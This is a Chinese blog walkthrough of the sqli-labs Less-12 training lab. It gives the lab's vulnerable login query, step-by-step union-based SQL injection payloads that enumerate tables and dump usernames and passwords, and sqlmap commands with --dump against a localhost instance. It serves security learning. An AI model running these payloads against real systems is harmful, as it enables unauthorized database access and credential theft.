sqli-labs:Less-12关卡详细解析

原创 已于 2025-07-31 17:51:42 修改 · 400 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sqli-labs #Less-12 #sql注入

于 2025-07-31 16:18:38 首次发布

1. 思路🚀

本关的SQL语句为:

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
  • 注入类型:字符串型(双引号、括号包裹)、POST请求
  • 提示:参数需以")闭合

php输出语句的部分代码:

if($row)
{
 	//echo '<font color= "#0000ff">';	
 	echo "<br>";
	echo '<font color= "#FFFF00" font size = 4>';
	//echo " You Have successfully logged in\n\n " ;
	echo '<font size="3" color="#0000ff">';	
	echo "<br>";
	echo 'Your Login name:'. $row['username'];
	echo "<br>";
	echo 'Your Password:' .$row['password'];
	echo "<br>";
	echo "</font>";
	echo "<br>";
	echo "<br>";
	echo '<img src="../images/flag.jpg"  />';	
 	echo "</font>";
}

从源码下手便于我们更清晰的锁定回显情况,从而更深入的理解知识点,每篇文章我都会附加上重点代码部分。
在这里插入图片描述

2. 手工注入步骤🎯

我的地址栏是:http://localhost:8081/Less-12/,只需要将下面的urlpost data放入对应位置,粘贴即可。

2.1. 判断能否注入⚡

uname=1") order by 3 #
&passwd=admin&submit=Submit
  • order by 3:探测字段数(报错说明字段数=2)

在这里插入图片描述

2.2. 判断回显点⚡

uname=1") union select 1,2 #
&passwd=admin&submit=Submit

在这里插入图片描述

2.3. 获取基础信息⚡

uname=1") union select database(),user() #
&passwd=admin&submit=Submit

在这里插入图片描述

2.4. 获取表名⚡

uname=1") union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'security' #
&passwd=admin&submit=Submit

在这里插入图片描述

2.5. 获取字段⚡

uname=1") union select 1,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' #
&passwd=admin&submit=Submit

在这里插入图片描述

2.6. 获取数据⚡

uname=1") union select group_concat(username),group_concat(password) from users #
&passwd=admin&submit=Submit

在这里插入图片描述

2.7. 参数汇总表⭐

参数作用示例
")闭合符号id=1')
#注释符#
order by判断字段数order by 3
union select联合查询union select 1,2,3
group_concat()合并结果group_concat(table_name)
information_schema系统数据库from information_schema.tables
table_schema数据库名称table_schema='security'
table_name数据表名称table_name='users'
column_name字段名称group_concat(column_name)

3. SQLMap工具测试🎯

url地址换成自己的,比如:http://localhost:8081/Less-12/,由于本关卡为post请求,需要加参数指明请求格式,
--data="uname=1&passwd=123456"unamepasswd的值随意,具体如下:⭐

# 检测注入点
python sqlmap.py -u "http://localhost:8081/Less-12/" --data="uname=1&passwd=123456" --batch

# 爆数据库
python sqlmap.py -u "url" --data="uname=1&passwd=123456" --dbs --batch

# 爆表名
python sqlmap.py -u "url" --data="uname=1&passwd=123456" -D security --tables --batch

# 爆列名
python sqlmap.py -u "url" --data="uname=1&passwd=123456" -D security -T users --columns --batch

# 爆数据
python sqlmap.py -u "url" --data="uname=1&passwd=123456" -D security -T users -C id,username,password --dump --batch

命令1截图:
在这里插入图片描述

命令5截图:
在这里插入图片描述

SQLMap参数表⭐

参数功能
--data指定post请求
--batch非交互模式
--dbs枚举数据库
-D指定数据库
-T指定表
-C指定列
--dump导出数据

4. 总结🏁

本关卡与关卡11的解法一致,但关卡11的解析更为详细,欢迎大家移步"sqli-labs:Less-11关卡详细解析"
https://blog.youkuaiyun.com/qq_62000508/article/details/149805916?spm=1011.2124.3001.6209

声明:本文仅用于安全学习,严禁非法测试! ❗❗❗

Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 1086
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2327
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs:65个关卡的文章汇总
qq_62000508的博客
08-02 702
本文汇总了sqli-labs SQL注入靶场从Less-1到Less-23的详细解析文章链接,并附上了墨者学院SQL注入靶场的解析汇总。作者持续更新各关卡解析内容,目前已完成前23关的详细教程,适合Web安全学习者和SQL注入研究人员系统学习参考。每篇解析都包含对应关卡的技术要点和破解方法,通过实战案例帮助读者深入理解SQL注入漏洞原理及防御方法。
sqli-labsLess-3关卡详细解析
qq_62000508的博客
07-30 525
这是一篇关于SQL注入攻击的实战技术文章,主要讲解了sqli-labs第三关的突破方法。文章从注入类型分析入手,详细展示了手工注入的完整步骤:判断字段数、确定回显位、获取数据库信息、表名和字段,最终获取数据。同时提供了SQLMap自动化工具的测试方法及参数说明。文章采用代码块+截图的方式直观呈现操作过程,并包含参数汇总表方便查阅。最后强调该技术仅用于安全学习,严禁非法测试。全文结构清晰,技术细节完整,具有实操指导价值。
sqli-labsLess-4关卡详细解析
qq_62000508的博客
07-30 514
本文详细解析SQL注入通关技巧,重点介绍Less-4关卡的字符串型注入方法。通过手工注入步骤演示了从判断字段数到获取数据的完整过程,包括特殊符号闭合、注释符使用等关键技巧。同时提供了SQLMap自动化工具的使用命令和参数说明,对比了手工与工具注入的优缺点。文章还包含详细的参数汇总表和不同场景下的注释符使用指南,适合安全学习人员掌握基础SQL注入原理。最后强调本文仅用于合法安全测试目的。
sqli-labsLess-5关卡详细解析
qq_62000508的博客
07-30 970
本文介绍了SQL注入中无回显情况下的报错盲注技术,通过MySQL的updatexml()函数触发错误信息获取数据。文章详细解析了报错注入的原理和手工注入步骤,包括判断字段数、确定回显位、获取基础信息、表名、字段和数据等关键环节。特别强调了updatexml()函数的报错机制和使用技巧,如推荐使用0x7e(~)强制报错。同时提供了SQLMap工具的自动化测试方法。文章内容实用,适合安全研究人员参考,帮助理解报错盲注的技术细节和实际应用。
sqli-labsLess-9关卡详细解析
qq_62000508的博客
07-31 565
本文介绍了SQL注入中的时间盲注技术,针对无回显的数据库查询场景。通过手工注入步骤演示了如何利用延时函数if()和sleep()判断数据库信息,包括字段数、数据库名、表名和字段内容。文章详细讲解了从判断字段数到获取数据的完整流程,提供了参数汇总表说明关键SQL语句的作用。这种方法虽然效率较低,但能绕过无回显限制,是安全测试人员需要掌握的技能之一。
sqli-labsLess-6关卡详细解析
qq_62000508的博客
07-30 726
摘要:本文详细解析SQL注入关卡6的解题思路与步骤。该关卡为字符串型注入,使用双引号闭合参数,通过报错盲注手法实现数据泄露。文章首先分析注入类型与回显特点,随后分步演示手工注入过程,包括判断字段数、确定回显位、获取数据库信息等关键操作,并附有参数汇总表。同时介绍了使用SQLMap工具的自动化测试方法及常用参数。最后指出本关卡关卡5解法类似,建议参考更详细关卡5解析,并强调本文仅用于安全学习目的。
sqli-labsLess-1关卡详细解析
qq_62000508的博客
07-30 492
SQL注入漏洞测试摘要 本文详细介绍了针对SQL注入漏洞(字符型单引号闭合)的手工检测方法和SQLMap自动化测试流程。主要内容包括: 手工注入步骤: 通过order by判断字段数(确定3个字段) 使用union select确认回显位(2、3列) 获取数据库名、用户信息等基础数据 从information_schema中提取表名、字段名 最终获取users表的账号密码数据 SQLMap自动化测试: 提供了完整的检测命令链 包含数据库枚举、表名获取、字段提取和数据导出 关键知识点: 单引号闭合原理
sqli-labsLess-14关卡详细解析
qq_62000508的博客
07-31 725
本篇文章详细讲解了SQL注入关卡Less-14的破解方法。该关卡为POST请求形式,使用双引号包裹字符串,需要通过报错盲注获取数据。文章首先分析题目特点,指出使用报错注入的原因,然后分步骤演示手工注入过程,包括判断字段数、获取数据库名、表名、列名和数据。同时提供了SQLMap自动化测试的完整命令及参数说明。文章最后推荐读者参考其他相关关卡详细解析,并声明仅用于安全学习目的。全文结构清晰,步骤明确,配有关键截图,便于读者理解和实践。
sqli-labsLess-21关卡详细解析
qq_62000508的博客
08-02 726
本文分析了SQL注入关卡Less-21的解题思路。该关卡基于Cookie进行字符串型注入,需通过Base64编码和解码绕过防护。文章详细介绍了手工注入步骤,包括获取数据库、表名、字段和数据的方法,并提供了报错盲注的SQL语句示例和Base64加解密工具链接。关键点在于闭合SQL语句的单引号和括号,利用updatexml()函数进行报错注入,同时通过Base64编码cookie值来绕过检测。最后总结了Cookie注入的利用方式,并强调该技术仅限安全学习使用。
sqli-labs靶场练习笔记
11-09
#### 三、具体关卡解析 - **第2关:数据库与表的探索** - **目标**:找出数据库名称、表名及列名,并提取数据。 - **实现步骤**: - 使用`information_schema`视图获取数据库名称。 - 使用`information_schema....
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1815
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
三菱图形操作终端连接手册(非三菱产品1).pdf
最新发布
08-03
三菱图形操作终端连接手册(非三菱产品1).pdf
【基于RESTful设计的高性能API接口实战开发:用户管理与权限控制系统全流程详解】
08-03
内容概要:本文档介绍了基于RESTful设计的高性能API接口的实战开发案例,涵盖从设计、开发、权限控制、性能优化到测试与文档自动化等环节。项目以用户管理与权限控制系统为例,采用Node.js + Express.js作为后端框架,MongoDB为数据库,Mongoose管理数据模型,严格遵循RESTful风格的接口设计,定义了标准HTTP动作对应的操作。安全性方面,实现了JWT认证机制和基于角色的访问控制(RBAC),确保接口安全。性能优化措施包括Redis缓存热点数据、接口请求频率限制、Winston和Morgan日志系统。开发调试借助Postman和Swagger UI,支持自动生成接口文档,提高前后端协作效率。部署方案利用Docker、Nginx、GitHub Actions等技术实现自动化部署,ELK用于日志收集与分析。; 适合人群:有一定编程基础,尤其是对API开发感兴趣的开发者和系统架构师。; 使用场景及目标:①学习RESTful风格的API设计原则;②掌握API的安全机制,如JWT认证和RBAC;③了解性能优化方法,如缓存和限流;④熟悉API开发的完整流程,包括测试、文档管理和部署。; 阅读建议:本案例详细描述了API开发的各个环节,建议读者按照文档顺序逐步学习,重点理解各部分的技术细节和实现原理,同时结合实际项目进行实践。
Canvas实现两张图片合成操作
08-03
资源下载链接为: https://pan.quark.cn/s/d9ef5828b597 Canvas实现两张图片合成操作
【电子设计竞赛】2025电赛D题全解:声音定位系统设计与实现详解
08-03
内容概要:本文详细解析了2025年全国大学生电子设计大赛D题——声音定位系统,从赛题要求、系统架构、硬件选型、算法选择到软件代码实现进行了全面阐述。赛题要求设计一个声音定位系统,包括声响模块、声音接收模块和信息处理模块。声响模块负责产生500Hz的声音信号,声音接收模块通过麦克风和放大电路接收声音信号,信息处理模块则根据声音传播的时间差计算声响模块的位置坐标,并显示出来。发挥部分还包括提高定位精度、连续跟踪显示坐标值和显示移动轨迹。文中还介绍了开发环境搭建、关键代码实现以及常见问题的解决方法。 适合人群:具备一定电子设计基础的大学生、电子设计爱好者和参赛选手。 使用场景及目标:①帮助参赛者理解赛题要求,掌握声音定位系统的设计和实现方法;②提升参赛者的电子设计能力和编程水平,为比赛做好准备;③通过实际项目锻炼创新思维和实践能力,积累宝贵的经验。 其他说明:本文不仅涵盖了硬件选型、电路设计、算法选择等技术细节,还提供了详细的代码实现和优化建议,有助于读者全面掌握声音定位系统的开发过程。此外,文章还强调了电子设计竞赛的重要性,鼓励读者积极参与,探索电子设计的无限可能。
基于FreeRTOS实时操作系统的STM32F103CBT6多功能无线遥控器开发项目_包含MPU6050陀螺仪数据采集_NRF24L01无线通信模块_096寸OLED显示屏_I2.zip
08-03
基于FreeRTOS实时操作系统的STM32F103CBT6多功能无线遥控器开发项目_包含MPU6050陀螺仪数据采集_NRF24L01无线通信模块_096寸OLED显示屏_I2
(完整版)安全知识竞赛试题(含完整答案).pdf
08-03
(完整版)安全知识竞赛试题(含完整答案).pdf
sqli-labs:v4
03-12
<think>好的,我现在需要帮助用户寻找关于sqli-labs version 4的下载或相关信息。首先,我应该回顾用户提供的引用内容,看看是否有相关的线索。用户给出的引用[1]到[4]主要涉及SQL注入的示例和技巧,比如使用sqlmap工具、报错注入以及不同注入类型的分类。特别是引用[4]提到了Less-46的报错注入,这可能与sqli-labs的不同关卡有关。 接下来,我需要确定sqli-labs的版本信息。用户提到的是version 4,但根据我的知识,sqli-labs通常指的是由Audi-1开发的SQL注入练习平台,常见的版本可能没有明确的v4标签。可能存在版本更新或分支,但用户可能需要确认正确的资源名称或来源。 检查用户提供的引用内容,引用[3]讨论了数据库类型对注入点的影响,而引用[4]则涉及具体的关卡示例。这可能意味着用户正在寻找sqli-labs中与这些注入技术相关的部分,比如不同的lessons或挑战。 现在,我应该考虑如何引导用户找到正确的资源。通常,sqli-labs可以在GitHub上找到,比如在Audi-1的仓库中。可能需要建议用户访问GitHub搜索或直接提供仓库链接。同时,提醒用户注意安全,在受控环境中使用这些资源。 另外,用户可能混淆了版本号,因为常见的sqli-labs可能有多个关卡(如Less-1到Less-75),而version 4可能指某个特定的关卡或分支。需要澄清这一点,并确保用户获得正确的材料。 最后,根据引用中提到的注入示例,用户可能对实践特定的注入技术感兴趣,因此建议他们查阅官方文档或社区资源以获取详细指导和更新信息。</think>关于寻找sqli-labs version 4的资源,以下是关键信息: 1. **项目来源** sqli-labs是由安全研究员Audi-1开发的SQL注入实验平台,主要用于Web安全攻防演练。最新版本可通过其GitHub仓库获取: ```bash git clone https://github.com/Audi-1/sqli-labs ``` 项目包含75个渐进式SQL注入关卡(如Less-1到Less-75),涵盖联合查询注入、报错注入、布尔盲注等类型[^3][^4] 2. **版本说明** - 该项目未使用V1-V4的版本编号体系,当前最新更新时间为2023年(查看GitHub提交记录) - 您提到的"version 4"可能指向以下内容: ✅ 第四类注入:根据数据库字段类型的分类,如数字型/字符型/搜索型注入[^3] ✅ 第四十六关:基于`?sort=`参数的注入实验(使用`rand()`函数触发报错) 3. **实验环境搭建** ```docker # 使用预配置的Docker镜像快速部署 docker run -d -p 80:80 acgpiano/sqli-labs ``` 访问`http://localhost`后点击"Setup/reset Database"初始化环境 4. **安全注意事项** - 仅在本地或授权环境运行 - 避免暴露在公网(存在真实漏洞) - 推荐配合DVWA、WebGoat等平台组合使用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值